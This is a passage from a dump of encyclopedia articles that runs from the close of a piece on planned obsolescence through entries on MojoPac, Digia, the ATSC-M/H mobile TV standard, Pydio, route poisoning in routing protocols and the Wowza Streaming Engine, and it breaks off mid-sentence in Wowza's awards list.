competitive and technological forces in a free society—forces that lead to ever-improving goods and services." Critics such as Vance Packard claim the process is wasteful and exploits customers. With psychological obsolescence, resources are used up making changes, often cosmetic changes, that are not of great value to the customer. Miles Park advocates new and collaborative approaches between the designer and the purchaser to challenge obsolescence in fast-moving sectors such as personal-use electronics. Some people, such as Ronny Balcaen, have proposed to create a new label to counter the diminishing quality of products due to the planned obsolescence technique. In academia Russell Jacoby, writing in the 1970s, observes that intellectual production has succumbed to the same pattern of planned obsolescence used by manufacturing enterprises to generate ever-renewed demand for their products. See also Artificial demand Bathtub curve—a concept of typical product failure Batterygate—a term used to describe the implementation of performance controls on older models of Apple's iPhone line in order to preserve system stability on degraded batteries Crippleware Defective by Design Durapolist—producer that manipulates the durability of its product Electronics right to repair—government legislation to allow people to repair their own devices Environmental effects of transport Hardware restriction—content protection enforced by electronic components. Interchangeable parts Light-weight Linux distribution—Linux distributions with lower hardware demands than other Linux distributions Phoebus cartel—worked to standardize the life expectancy of light bulbs at 1,000 hours, down from 2,500 hours Prognostics—engineering discipline focused on predicting the life times Repairability Software bloat—successive versions of a computer program requiring ever more computing power Vendor lock-in—making a customer dependent on a vendor for products and services, unable to use another vendor without substantial switching costs. References Further reading Brand management Ethically disputed business practices Marketing techniques Obsolescence Product expiration Right to Repair
7475420
https://en.wikipedia.org/wiki/MojoPac
MojoPac
MojoPac was an application virtualization product from RingCube Technologies. MojoPac turns any USB 2.0 storage device into a portable computing environment. The term "MojoPac" is used by the company to refer to the software application, the virtualized environment running inside this software, and the USB storage device that contains the software and relevant applications. MojoPac supports popular applications such as Firefox and Microsoft Office, and it is also high performance enough to run popular PC Games such as World of Warcraft, Minecraft and Half-Life 2. The RingCube website is currently forwarded to Citrix, which has apparently purchased the company and discontinued MojoPac. Usage To initially set up the MojoPac device, the user runs the installer and selects a USB device attached to the system. Once MojoPac is installed, it creates an executable in the root of that device along with an autorun file that gives the user the option of starting the MojoPac environment automatically when the device is plugged in (subject to how the host PC is configured). Once this application is started, a new Windows Desktop (with its own wallpaper, icons, shell, etc.) is started up in the virtualized MojoPac environment. Any application that runs inside this environment runs off the USB device without affecting the filesystem of the host. A user installs most applications (including Microsoft Office, Adobe Photoshop, Firefox) on the portable storage device by simply running the installer inside this environment. The user can switch between the host environment and the MojoPac environment by using the MojoBar at the top of the screen. Once the user is done with the applications, they exit MojoPac and eject the USB device. To run the applications on a different computer, the user does not need to reinstall the application. The user can plug the portable storage device into any Windows XP computer. All the user's settings, applications, and documents function the same irrespective of which computer the portable storage device is connected to. The computer does not need any special applications or drivers installed to use MojoPac, although administrator rights are required if "MojoPac Usher" has not been installed on the host PC. When the portable storage device is disconnected from the computer, there is no personal information left behind on the computer. Requirements Requires Windows XP Home or Pro; Windows 2000 is not supported, though Vista was planned to be supported in the near future (it never was). Requires Administrator access. A special version, MojoPac Usher, can be run in Universities or other locked down environments if the administrator is present to log in once . A Limited User version was under development. Security MojoPac does not include features to encrypt the data on the USB drive, but does have a password protection system that prevents a person from starting up the MojoPac environment. All the files on the USB drive do not have any additional encryption, which is problematic if the MojoPac device is lost. However, this is no different from a default Windows XP installation and MojoPac can be used together with OTFE software such as FreeOTFE or TrueCrypt to provide any desired strong encryption and plausible deniability (just as Windows XP can). A MojoPac device secured using this type of software is reasonably safe in the case of theft. Because of the virtualization performed by MojoPac, applications running inside the MojoPac environment cannot (generally) modify the host. For example, all the browsing history for Internet Explorer and other browsers is stored on the USB device rather than the host. Similarly, if a malicious program tries to delete the C:\Windows directory inside MojoPac, the files on the USB device are deleted, but the files on the host machine will remain. However, it is possible for a user to modify MojoPac's system files, which are then reflected to the same system files of the host PC, so the current level of isolation between the virtual environment and the host PC is not as strong as provided by full machine virtualization technologies like VMware. RingCube has stated this is a known bug which will be addressed in a future version of MojoPac. See also Comparison of application launchers vDesk - a similar product produced by RingCube Portable application creators Windows To Go References External links The Wall Street Journal - Turning Another Computer Into Your Own Lifehacker - Build your 'PC on a stick' with Mojopac Security Now Episode about Mojopac Leo Laporte and Steve Gibson discuss Mojopac in the Security Now podcast A Detailed Article about MojoPac Virtualization software Portable software suites
63260867
https://en.wikipedia.org/wiki/Digia
Digia
Digia Oyj (formerly SYSOPENDIGIA, SysOpen Digia and SysOpen) is a Finnish software company listed on the Helsinki Stock Exchange. Digia focuses especially on financial services, the public sector, social welfare and healthcare, trade, services, industry and energy. In 2020, Digia has more than 1,200 employees in Finland and Sweden (Stockholm). The Finnish offices are located in Helsinki, Jyväskylä, Lahti, Oulu, Rauma, Tampere, Turku and Vaasa. History SysOpen (1990–2004) and Digia (1997–2004) SysOpen was founded in 1990 by Kari Karvinen, Jorma Kylätie and Matti Savolainen. SysOpen was listed on the stock exchange in 1999 and grew strongly through corporate acquisitions until around the turn of the millennium. In 1997, Pekka Sivonen, Mika Malin and Jarkko Virtanen founded Digia Oy. SysOpen Digia 2004–2007 SysOpen Oyj and Digia Oy merged on 4 March 2005 to form SysOpen Digia Oyj. According to Talouselämä magazine, the merger was a cheap way for Digia to get listed on the stock exchange. In the new company, Digia employees were granted the positions of both Chairman of the Board (Pekka Sivonen) and CEO (Jari Mielonen). The reason for this was Digia's better profitability: its earnings before interest, taxes and goodwill amortization were 15 per cent, while SysOpen's were 9 per cent. The new company's main customers included device manufacturers, such as Nokia, operators and corporate customers. In addition to Sivonen, SysOpen-Digia's Board of Directors included Kari Karvinen (Vice Chairman), Pekka Eloholma, Pertti Kyttälä, Matti Mujunen and Mikko Terho. In the summer of 2006, SysOpen Digia Oyj acquired the integration and production management software company Sentera Oyj and Sentera's business was merged into SysOpen Digia. The company's name was changed to SYSOPENDIGIA Oyj in 2007. SysOpen Digia's Pekka Sivonen won the Services category of the Entrepreneur of the Year competition for growth companies organized by Ernst and Young in 2004–2006. SysOpen Digia was Finland's leading integrator of information system and communications, employing 1,100 people with a turnover of EUR 61 million in 2005. Digia 2008–2016 The company was renamed Digia Oyj in 2008. In March 2011, Digia acquired Nokia's Qt commercial and open source licensing and service business. As a subcontractor, Digia suffered from Nokia's problems, resulting in several employer-employee negotiations. The end of Nokia subcontracting led to the loss of one third of turnover as well as employees, but the company's IT services sustained it through the worst times. In 2012, Digia acquired the entire Qt development environment and related business from Nokia. With the acquisition, Digia took over all operations related to Qt technology, such as product development. The most important goal of the acquisition was to improve Digia's position in the Qt ecosystem and to expand the availability of Qt technology to an increasing number of platforms. The Qt investment of EUR 4 million yielded at least tens of millions of euros to shareholders. Digia's CEO Juha Varelius negotiated the Qt deal with Nokia after Nokia had abandoned its old subcontractors. In 2016, Talouselämä magazine estimated that the deal was made at a dumping price. Nokia had acquired the Norwegian company Trolltech and its application development environment Qt for EUR 104 million in January 2008. In August 2015, Digia Oyj's Board of Directors decided to explore a possible spin-off that would separate its domestic and Qt businesses and create two distinct companies, with identical ownership, listed on the Helsinki Stock Exchange. Digia's largest shareholder was Ingman Development, owned by the Ingman family, which held a stake of more than one fifth. Digia's turnover totalled EUR 108 million. Digia 2016–Present Digia Oyj's Annual General Meeting decided on Digia's partial demerger in March 2016, and the demerger was registered in the Trade Register on 1 May. Digia's Qt business was transferred to Qt Group with Digia's domestic business remaining under the Digia brand. Digia's CEO Juha Varelius became the CEO of Qt Group while Timo Levoranta, who had started as the head of the domestic business unit early in the year, took up the post as CEO of the new Digia. In June 2016, Digia acquired Igence, a consulting firm owned by Transaktum, to improve its position in the e-commerce market. Igence employed 24 people and its service portfolio included e-commerce, product information management, order management and personalisation software as well as expert services, with a turnover of EUR 2.26 million in 2015. In October 2016, the Finnish Tax Administration announced that it had selected Digia to implement the National Incomes Register. In the spring of 2017, Digia acquired Omni Partners Oy and its subsidiary Oy Nord Software Ltd. In May, Digia's Board of Directors announced that it would organise a rights issue in order to raise approximately EUR 12.05 million in net assets for corporate acquisitions, growth investments, to bolster the company's capital structure and for general financing needs. The rights issue was oversubscribed with over 6.8 million shares subscribed, representing approximately 115% of the shares offered. The issue generated gross proceeds amounting to approximately EUR 12.5 million. The company established Financial Operations to support the growth of its product and service business and combined Horizontal Services with the functions reporting to the CTO. In December, Digia acquired Integration House. Digia had more than 800 employees and its turnover totaled EUR 96.2 million. In March 2018, Digia acquired Avarea Oy, a Helsinki-based company specialising in analytics software, which had a turnover of approximately EUR 3.6 million. Avarea's product business was excluded from the acquisition and transferred into its own company. 41 employees joined Digia. In the summer of 2018, Digia announced the acquisition of Mavisystems and its subsidiary Mirosys Oy. The companies, which employed a total of 34 people, specialised in Microsoft Dynamics ERP systems and CRM software and their turnover totaled approximately EUR 3.2 million in the financial period ended in June 2017. Digia's turnover totaled EUR 112.1 million and it employed 1,069 people. The company's operating margin was 5.8 per cent. In June 2019, Digia announced the acquisition of Accountor Enterprise Solutions, a subsidiary of Accountor focused on business platforms and services whose software centered around Microsoft Dynamics 365 and Oracle NetSuite services. The purchase price was EUR 9.4 million. Accountor Enterprise Solutions had a turnover of EUR 12.7 million in 2018 and it employed 114 people in June 2019. Digia's turnover was increased especially by good demand for online business, integrations and software interface services, Microsoft ERP systems and business analytics. Organisation The company's CEO has been Timo Levoranta since 2016. In 2020, Digia's Board of Directors included, in addition to Chairman Robert Ingman, Seppo Ruotsalainen, Martti Ala-Härkönen, Päivi Hokkanen, Santtu Elsinen and Outi Taivainen. In December 2019, Digia's largest shareholders were Ingman Development, Ilmarinen, Etola, Tiiviste-Group, Varma Mutual Pension Insurance Company, Matti Savolainen, SEB Group, Nordea, and OP Financial Group. In 2020, Digia's services were divided into six categories: Service design and business consulting, Digital services, such as e-commerce, product data management, mobile services and online services, Data analytics, such as data platform, data management, customer intelligence, profitability analytics, Artificial intelligence and Internet of things, Integration and API; In online shops for example, the integration chain progresses from the user interface to the company's business ecosystem and affects things such as how seamlessly the systems of the company and its suppliers work together. Business systems such as Microsoft and Oracle ERP systems, which Digia tailors for customer companies, in addition to Digia's own ERP system. Digia has been the largest provider of Microsoft Dynamics in Finland since July 2018. Monitoring and service management. Customers Digia's customers include Gasum, the Helsinki Regional Transport Authority, the Emergency Response Centre Agency in Finland, the Finnish Defence Forces, St1 and the Finnish Tax Administration. Digia has redesigned, for example, the Stockmann online shop and its ERP platform is used by Etola, among others. Awards In 2017, the 112 Suomi mobile application implemented by the Emergency Response Centre Agency and Digia won a national social welfare and healthcare safety award in Finland. The 112 Suomi application uses satellite positioning to locate those in need of assistance. The application sends the coordinates directly to the Emergency Response Centre's information system when a person in need of assistance uses the application to call the emergency telephone number. References Companies established in 1990 ERP software Software companies of Finland
11540737
https://en.wikipedia.org/wiki/ATSC-M/H
ATSC-M/H
ATSC-M/H (Advanced Television Systems Committee - Mobile/Handheld) is a U.S. standard for mobile digital TV that allows TV broadcasts to be received by mobile devices. ATSC-M/H is a mobile TV extension to preexisting terrestrial TV broadcasting standard ATSC A/53. It corresponds to the European DVB-H and 1seg extensions of DVB-T and ISDB-T terrestrial digital TV standards respectively. ATSC is optimized for a fixed reception in the typical North American environment and uses 8VSB modulation. The ATSC transmission method is not robust enough against Doppler shift and multipath radio interference in mobile environments, and is designed for highly directional fixed antennas. To overcome these issues, additional channel coding mechanisms are introduced in ATSC-M/H to protect the signal. As of 2021, ATSC-M/H is considered to have been a commercial failure. Evolution of mobile TV standard Requirements Several requirements of the new standard were fixed right from the beginning: Completely backward compatible with ATSC (A/53) Broadcasters can use their available license without additional restrictions Available legacy ATSC receivers can be used to receive the ATSC (A/53) standard without any modification. Proposals Ten systems from different companies were proposed, and two remaining systems were presented with transmitter and receiver prototypes: MPH (an acronym for mobile/pedestrian/handheld, suggesting miles per hour), was developed by LG Electronics and Harris Broadcast. (Zenith, a subsidiary of LG, developed much of the original ATSC system.) A-VSB (Advanced-VSB) was developed by Samsung and Rohde & Schwarz. To find the best solution, the Advanced Television Systems Committee assigned the Open Mobile Video Coalition (OMVC) to test both systems. The test report was presented on May 15, 2008. As a result of this detailed work by the OMVC, a final standard draft was designed by the Advanced Television Systems Committee, specialist group S-4. ATSC-M/H will be a hybrid. Basically the following components of the proposed systems are used: RF-Layer from the MPH standard Deterministic frame structure from A-VSB Signaling of service designed on the base of the established mobile standards Standard milestones On December 1, 2008, the Advanced Television Systems Committee elevated its specification for Mobile Digital Television to Candidate Standard status. In the following six months, the industry tested the standard. Before it became an official standard, additional improvements were proposed. ATSC members approved the ballot on October 15, 2009 to official standard A/153. ATSC introduced in January 2010 at Consumer Electronics Show, the name and logo for "MDTV" for ATSC A/153. Structure of mobile DTV standard The ATSC Mobile DTV standard ATSC-M/H (A/153) is modular in concept, with the specifications for each of the modules contained separate Parts. The individual Parts of A/153 are as follows: Part 1 “ATSC Mobile DTV System” describes the overall ATSC Mobile DTV system and explains the organization of the standard. It also describes the explicit signaling requirements that are implemented by data structures throughout the other Parts. Part 2 “RF/Transmission System Characteristics” describes how the data is processed and placed into the VSB frame. Major elements include the Reed Solomon (RS) Frame, a Transmission Parameter Channel (TPC), and a Fast Information Channel (FIC). Part 3 “Service Multiplex and Transport Subsystem Characteristics” covers the service multiplex and transport subsystem, which comprises several layers in the stack. Major elements include Internet Protocol (IPv4), UniDirectional Protocol (UDP), Signaling Channel Service, FLUTE over Asynchronous Layered Coding (ALC) / Layered Coding Transport (LCT), Network Time Protocol (NTP) time service, and Real-time Transport Protocol (RTP) / RTP Control Protocol (RTCP). Part 4 “Announcement”: Part 4 covers Announcement, where services can optionally be announced using a Service Guide. The guide specified in Part 4 is based on an Open Mobile Alliance (OMA) broadcast (BCAST) OMA BCAST-Electronic program guide, with constraints and extensions. Part 5 “Application Framework” defines the Application framework, which enables the broadcaster of the audio-visual service to author and insert supplemental content to define and control various additional elements of the Rich Media Environment (RME). Part 6 “Service Protection” covers Service Protection, which refers to the protection of content, either files or streams, during delivery to a receiver. Major elements include the Right Issue Object and Short-Term Key Message (STKM). Part 7 “AVC and SVC Video System Characteristics” defines the Advanced Video Coding (AVC) and Scalable Video Coding (SVC) Video System in the ATSC Mobile DTV system. Additional elements covered in this Part included closed captioning (CEA 708) and Active Format Description (AFD). Part 8 “AHE AAC Audio System Characteristics” defines the High-Efficiency Advanced Audio Coding (HE-AAC v2) Audio System in the ATSC Mobile DTV system. Part 9 “Scalable Full Channel Mobile Mode” Principle ATSC-M/H is a service for mobile TV receivers and partly uses the 19.39 Mbit/s ATSC 8VSB stream. The mobile data is carried in an unreferenced Packet ID, so legacy receivers ignore the mobile data. Technology ATSC-M/H bandwidth consumes fixed chunks of 917kbit/s out of the total ATSC Bandwidth. Each such chunk is called an M/H Group. A data pipe called a parade is a collection of one to eight M/H groups. A parade conveys one or two ensembles which are logical pipes of IP datagrams. Those datagrams in turn carry TV services, System Signaling tables, OMA DRM key streams and the Electronic Service Guide. ATSC-M/H has an improved design based on detailed analyses of experiences with other mobile DTV standards. Protocol stack ATSC-M/H protocol stack is mainly an umbrella protocol that uses OMA ESG, OMA DRM, MPEG-4 in addition to many IETF RFCs. Transport stream data structure The ATSC-M/H standard defines a fixed transport stream structure, based on M/H Frames, which establishes the location of M/H content within the VSB Frames and allows for easier processing by an M/H receiver. This is contrary to the legacy ATSC transport stream, defined in A/53, in which there is no fixed structure to establish the phase of the data relative to VSB Frames. One M/H Frame is equivalent in size to 20 VSB Frames and has an offset of 37 transport stream (TS) packets relative to the beginning of the VSB Frame. Each M/H Frame, which has a fixed duration of 968 ms, is divided into five M/H sub-frames and each sub-frame is further subdivided into sixteen M/H Slots. Each slot is the equivalent amount of time needed to transmit 156 TS packets. A slot may either carry all main ATSC data (A/53) or 118 packets of M/H data and 38 packets of main data. The collection of 118 M/H packets transmitted within a slot is called an M/H Group. Each of the 118 M/H packets within an M/H Group are encapsulated inside a special TS packet, known as an MHE packet. An M/H Parade is a collection of M/H Groups and can carry one or two M/H Ensembles. These Ensembles are logical pipes for IP datagrams. Those datagrams in turn carry TV services and the signaling of mobile content. The M/H Groups from a single Parade are placed within M/H Slots according to an algorithm defined in A/153 Part 2. The Number of Groups per M/H Sub-Frame (NoG) for an M/H Parade ranges from 1 to 8 and therefore the number of Groups per an M/H Frame for a Parade ranges from 5 to 40 with a step of 5. The data of a Parade are channel coded and distributed by an interleaver during an M/H Frame. Mobile Data are protected by an additional FEC, as Interleaving and Convolutional codes. To improve the reception in the receiver, training sequences are introduced into the ATSC-M/H signal to allow channel estimation on the receiver side. Time slicing is a technique used by ATSC-M/H to provide power savings on receivers. It is based on the time-multiplexed transmission of different services. Error protection ATSC-M/H combines multiple error protection mechanisms for added robustness. One is an outer Reed–Solomon error correction code which corrects defective bytes after decoding the outer convolutional code in the receiver. The correction is improved by an additional CRC checksum since bytes can be marked as defective before they are decoded (erasure decoding). The number of RS parity symbols can represent 24, 36 or 48. The symbols and the additional checksum form the outer elements of a data matrix which is allocated by the payload of the M/H Ensemble. The number of lines is fixed and the number of columns is variable according to how many slots per Subframe are occupied. The RS Frame is then partitioned into several segments of different sizes and assigned to specified regions. The M/H data in these regions are protected by an SCCC (Series Concatenated Convolutional Code), incorporating a code rate of 1/2 or 1/4, and is specific to each region in a group. A 1/4 rate PCCC (Parallel Concatenated Convolutional Code) is also employed as an inner code for the M/H signaling channel, which includes FIC (Fast Information Channel) and TPC (Transmission Parameter Channel). The TPC carries various FEC modes and M/H Frame information. Once the TPC is extracted, the receiver then knows the code rates being employed and can decode each region at its specified rate. A modified trellis encoder is also employed for backwards compatibility with legacy A/53 receivers. The time interleaving of ATSC-M/H is 1 second. Signaling ATSC M/H Signaling and Announcement defines three different layers of signalling. The layers are organized hierarchically and optimized to characteristics of the transmission layer. Transmission Signaling System is the lowest layer and uses the Transmission Parameter Channel (TPC). It provides information for the receiver needed to decode the signal Transport Signaling System is the second layer, which uses the Fast Information Channel (FIC) in combination with the Service Signaling Channel (SSC). The main purpose of the FIC is to deliver essential information to allow rapid service acquisition by the receiver. The Service Signaling Channel (SSC), consists of several different signaling tables. The information carried within these tables can be compared to the PSIP information of ATSC. The SSC provides mainly the basic information, the logical structure of the transmitted services and the decoding parameters for video and audio. Announcement / Electronic Service Guide (ESG) is the highest layer of signaling. It uses the Open Mobile Alliance (OMA) Broadcast Service Enabler Suite (OMA BCAST) Electronic Service Guide (ESG). An ESG is delivered as a file data session File Delivery over Unidirectional Transport (FLUTE), and is used as the delivery protocol. The ESG consists of several XML sections. With this structure, a program guide and enabled interactive services can be realized. Signaling of video- and audio coding Each video- or audio decoder needs information about the used coding parameters, for instance resolution, frame rate and IDR (Random Access Point) repetition rate. In MPEG-4/AVC, mobile TV systems the receiver uses information from the Session Description Protocol File (SDP-File). The SDP-file is a format which describes streaming media initialization parameters. In ATSC-M/H, the SDP-File is transmitted within the SMT-Table. Most of the information is coded in binary, but some is coded in the original ASCII text format. The SMT-Table combines information that is typically in different tables and reduces the complexity for the network and the receivers. In case of signaling with ESG, the complete SDP-File is transmitted. Single-frequency network (SFN) In an SFN, two or more transmitters with an overlapping coverage send the same program content simultaneously on the same frequency. The 8VSB modulation used by ATSC allows SFN transmissions. To allow regular channel approximation, ATSC-M/H provides additional training sequences. ATSC A/110 defines a method to synchronize the ATSC modulator as part of the transmitter. The A/110 standard sets up the Trellis coder in a pre-calculated way to all transmitters of the SFN. In such an SFN, the ATSC-M/H multiplexer and the ATSC-M/H transmitter are synchronized by a GPS reference. The ATSC-M/H multiplexer operates as a network adapter and inserts time stamps in the MPEG transport stream. The transmitter analyzes the time stamp, delays the transport stream before it is modulated and transmitted. Eventually, all SFN transmitters generate a synchronized signal. Other mobile standards Until its shutdown, MediaFLO had been available in parts of the United States. It was a premium service that required subscription. ATSC-M/H would be free to air, as are regular broadcast signals. References External links ATSC Broadcast engineering Mobile telephone broadcasting Mobile television Television transmission standards ja:ATSC#ATSC-M/H
51389352
https://en.wikipedia.org/wiki/Pydio
Pydio
Pydio Cells, previously known as just Pydio and formerly known as AjaXplorer, is an open-source file-sharing and synchronisation software that runs on the user's own server or in the cloud. Presentation The project was created by musician Charles Du Jeu (current CEO and CTO) in 2007 under the name AjaXplorer. The name was changed in 2013 and became Pydio (an acronym for Put Your Data in Orbit). In May 2018, Pydio switched from PHP to Go with the release of Pydio Cells. The PHP version reached end-of-life state on 31 December 2019. Pydio Cells runs on any server supporting a recent Go version (Windows/Linux/macOS on the Intel architecture is directly supported; a fully-functional working ARM implementation is under active development). The current offering of Pydio, known as Pydio Cells, has been developed from scratch using the Go programming language. Nevertheless, the web-based interface of Cells is very similar to the one from Pydio 8 (in PHP), and it successfully replicates most of the features, while adding a few more. There is also a new synchronisation client (also written in Go). The PHP version is being phased out as the company's focus is moving to Pydio Cells, with community feedback on the new features. According to the company, the switch to the new environment was made "to overcome inherent PHP limitations and provide you with a future-proof and modern solution for collaborating on documents". From a technical point of view, Pydio differs from solutions such as Google Drive or Dropbox. Pydio is not based on a public cloud, the software indeed connects to the user's existing storages (SAN / Local FS, SAMBA / CIFS, (s)FTP, NFS, etc...) as well as to the existing user directories (LDAP / AD, SAML, Radius, Shibboleth...), which allows companies to keep their data inside their infrastructure, according to their data security policy and user rights management. The software is built in a modular perspective; various plugins allow administrators to implement extra features. Pydio is available either through a community distribution, or an Enterprise Distribution. Features File sharing between different internal users and across other Pydio instances SSL/TLS Encryption WebDAV file server Creation of dedicated workspaces, for each line of business / project / client, with a dedicated user rights management for each workspace. File-sharing with external users (private links, public links, password protection, download limitation, etc.) Online viewing and editing of documents with Collabora Office (the Enterprise Distribution also offers OnlyOffice integration) Preview and editing of image files Integrated audio and video reader Client applications are available for all major desktop and mobile platforms. See also Comparison of file synchronization software References External links (Pydio Cells) (Pydio Cells Synchronisation Client) (Pydio PHP version, deprecated on December 31, 2019) Cloud computing Cloud storage File hosting Free software for cloud computing Free software programmed in PHP Free software programmed in Go
2539918
https://en.wikipedia.org/wiki/Route%20poisoning
Route poisoning
Route poisoning is a method to prevent a router from sending packets through a route that has become invalid within computer networks. Distance-vector routing protocols in computer networks use route poisoning to indicate to other routers that a route is no longer reachable and should not be considered from their routing tables. Unlike the split horizon with poison reverse, route poisoning provides for sending updates with unreachable hop counts immediately to all the nodes in the network. When the protocol detects an invalid route, all of the routers in the network are informed that the bad route has an infinite (∞) route metric. This makes all nodes on the invalid route seem infinitely distant, preventing any of the routers from sending packets over the invalid route. Some distance-vector routing protocols, such as RIP, use a maximum hop count to determine how many routers the traffic must go through to reach the destination. Each route has a hop count number assigned to it which is incremented as the routing information is passed from router to router. A route is considered unreachable if the hop count exceeds the maximum allowed. Route poisoning is a method of quickly forgetting outdated routing information from other router's routing tables by changing its hop count to be unreachable (higher than the maximum number of hops allowed) and sending a routing update. In the case of RIP, the maximum hop count is 15, so to perform route poisoning on a route its hop count is changed to 16, deeming it unreachable, and a routing update is sent. If these updates are lost, some nodes in the network would not be informed that a route is invalid, so they could attempt to send packets over the bad route and cause a problem known as a routing loop. Therefore route poisoning is used in conjunction with holddowns to keep update messages from falsely reinstating the validity of a bad route. This prevents routing loops, improving the overall efficiency of the network. References The TCP-IP Guide, RIP Special Features For Resolving RIP Algorithm Problems, by Charles M. Kozierok RFC 1058: Routing Information Protocol, by C. Hedrick, Rutgers University (June 1988) Internet Standards Internet protocols Routing protocols
29349987
https://en.wikipedia.org/wiki/Wowza%20Streaming%20Engine
Wowza Streaming Engine
Wowza Streaming Engine (known as Wowza Media Server prior to version 4) is a unified streaming media server software developed by Wowza Media Systems. The server is used for streaming of live and on-demand video, audio, and rich Internet applications over IP networks to desktop, laptop, and tablet computers, mobile devices, IPTV set-top boxes, internet-connected TV sets, game consoles, and other network-connected devices. The server is a Java application deployable on most operating systems. History Version 1.0.x was released on February 19, 2007. This version was originally offered as an alternative to the Adobe Flash Media Server, and supported streamed video, audio and RIA’s for the Flash Player client playback and interaction based on the Real Time Messaging Protocol (RTMP) using content encoded with Spark and VP6 codecs. The original product name was Wowza Media Server Pro. Version 1.5.x was released on May 15, 2008 and added support for H.264 video and Advanced Audio Coding (AAC) audio, and ingest support for Real Time Streaming Protocol (RTSP), Real-time Transport Protocol (RTP), MPEG transport stream (MPEG-TS), and ICY (SHOUTcast/Icecast) sources for re-streaming to the Flash Player client. Version 2.0.x was released on December 17, 2009. The product name was changed to Wowza Media Server 2. This version added outbound H.264 streaming support for Apple HTTP Live Streaming protocol for iOS devices (iPad, iPhone, etc.), Microsoft HTTP Smooth Streaming for Silverlight player, RTSP/RTP for QuickTime Player and mobile devices based on Android, BlackBerry (RIM), Symbian (Symbian Foundation), Palm webOS (now owned by HP), and other platforms, and TV set-top boxes and video game consoles. Version 3.0.x was released on October 7, 2011. This version added network DVR, Live transcoding, and DRM plug-in functionality. Version 3.5 was released on November 7, 2012. This version added Closed Captioning and a Silverlight Multicast Player. Live Stream Record and Media Security, previously additional features external to the software, were incorporated into the server software. Media Security DRM plugins with Verimetrix VCAS, Microsoft PlayReady, BuyDRM KeyOS Services, EZDRM Hosted DRM, AuthenTec DRM Fusion. Wowza also released Wowza StreamLock free AddOn which provides 256-bit SSL for RTMPS and HTTPS. The release included enhancements to Wowza Transcoder AddOn; transcoder overlays that can be used for advertising, tilting, watermarks and tickers. Other new features include B-frame support, Dolby Digital Plus (EAC3) pass-through for HLS, MPEG-DASH, HTTP Origin. Version 3.6 was released June 10, 2013. Wowza Media Server 3.6 added basic support for Dynamic Adaptive Streaming over HTTP (DASH). Expanded support for closed captioning formats for live and video-on-demand streams. Version 4.0 was released February 11, 2014. The product name was changed to Wowza Streaming Engine. This release includes a new web-based graphical interface which interacts with the server via a REST API and provides monitoring and configuration functions. This release also brings full support for MPEG-DASH and support for additional for captioning formats. Previously available separately, the MediaCache and Push Publishing add-on modules are now included in the server. Version 4.2 was released on June 16, 2015. This release included the Stream Targets feature in Wowza Streaming Engine Manager, enabling you to send an incoming live source stream to one or more destinations that re-distribute the source stream to users. Stream target destinations allow you to scale and add redundancy to your live streaming workflow. Version 4.3 was released on October 6, 2015. New functionality included full access to the Wowza Streaming Engine REST API. You can use the REST API to configure, manage, and monitor the media server through HTTP requests. Version 4.7.3 was released on November 14, 2017. Wowza Streaming Engine 4.7.3 software added support for Secure Reliable Transport (SRT) in Wowza Streaming Engine media servers on Linux and Windows operating systems. Wowza Streaming Engine 4.7.3 also introduced the ability to create a generic stream target that sends an SRT stream from Wowza Streaming Engine to destinations such as content delivery networks (CDNs) and streaming services for distributed delivery. Version 4.7.6 was released on July 31, 2018. New functionality included support for MPEG-DASH with nDVR. The Wowza nDVR feature enables you to record a live stream with Wowza Streaming Engine while simultaneously allowing users to play or pause the live stream, rewind it to a previously recorded point, or resume viewing at the current live point. Version 4.7.7 was released on November 13, 2018. Wowza Streaming Engine 4.7.7 added support for WebRTC. Wowza Streaming Engine can ingest source WebRTC audio and video content and deliver it to supporting players. It can also transmux or transcode WebRTC to other streaming protocols, including Apple HLS, Adobe HDS, RTMP, RTSP, and Microsoft Smooth Streaming. Version 4.7.8 was released November 5, 2019. Added functionality included support for Low-Latency HLS. Wowza Streaming Engine can now generate Low-Latency HLS live streams. Wowza Streaming Engine now also supports Common Media Application Format (CMAF), the open, extensible standard that enables efficient streaming using the HLS and MPEG-DASH protocols. Version 4.8 was released February 18, 2020. The update added full support for WebRTC and Secure Reliable Transport (SRT) streaming; the addition of the CMAF packetizer for MPEG-DASH, HLS, and Low-Latency HLS streaming; and added support for recording MPEG-DASH live streams with the nDVR feature. Version 4.8.5 was released June 17, 2020. Extensive updates were added related to WebRTC including improved accuracy of RTCP feedback messages for adaptive encoding. There is now support for SRT version 1.4 and EXT-X-PRELOAD-HINT media playlist tag for Low Latency HLS. The new version also increased security. Formats Wowza Streaming Engine can stream to multiple types of playback clients and devices simultaneously, including the Adobe Flash player, Microsoft Silverlight player, Apple QuickTime Player and iOS devices (iPad, iPhone, iPod Touch), mobile phones, IPTV set-top boxes (Amino, Apple TV, Enseo, Fire TV, Roku, Streamit and others), and game consoles such as Wii, Xbox, and PS4. Wowza Streaming Engine is compatible with standard streaming protocols. On the playout side, these include RTMP (and the variants RTMPS, RTMPT, RTMPE, RTMPTE), HDS, HLS, MPEG-DASH, WebRTC, RTSP, Smooth Streaming, and MPEG-TS (unicast and multicast). On the live ingest side the server can ingest video and audio via RTP, RTSP, RTMP, MPEG-TS (unicast and multicast), ICY (SHOUTcast / Icecast) and WebRTC streams. In 2017 Wowza and Haivision created SRT Alliance to develop and promote an open-source SRT protocol for low latency reliable-UDP delivery. For on-demand streaming, Wowza Streaming Engine can ingest multiple types of audio and video files. Supported file types include MP4 (QuickTime container - .mp4, .f4v, .mov, .m4a, .m4v, .mp4a, .mp4v, .3gp, and .3g2), FLV (Flash Video - .flv), and MP3 content (.mp3). Awards 2007 Streaming Media Magazine Editors’ Pick 2008 Streaming Media Magazine Editors’ Pick 2008 Streaming Media Magazine US Readers’ Choice (Best Server) 2009 Streaming Media Magazine US Readers’ Choice (Best Server; Best Streaming Innovation) 2010 TV Technology Europe Magazine STAR Award 2010 Streaming Media Magazine European Readers’ Choice Awards (Best Server; Best Innovation) 2010 WFX New Product Award (Best Overall New Media Product; Best Podcasting, Webcasting, and Website Streaming Media Solution) 2011 Streaming Media Magazine European Readers’ Choice Awards (Best Server; Best Streaming Innovation) 2012 European Readers' Choice Award (BestServer Software and Best Transcoding Solution) 2013 Streaming Media Magazine'''s All-StarTeam named Wowza Co-Founder and CTO Charlie Good 2013 Streaming Media Magazine European Readers’ Choice Award (Server Hardware/Software) 2013 Streaming Media Readers’ Choice Award (Media Server)<ref>Press Release [http://www.wowza.com/news/wowza-wins-2013-streaming-media-readers-choice-award Streaming Media Magazine Readers’ Choice Award (Media Server)]</ref> 2014 Streaming Media Magazine'' European Readers’ Choice Award (Best Streaming Innovation) Wowza Media Server Pro won the Server Hardware/Software category in the Streaming Media Readers' Choice Awards in 2008. Wowza Media Server 2 Advanced won the Best Streaming Innovation category in the 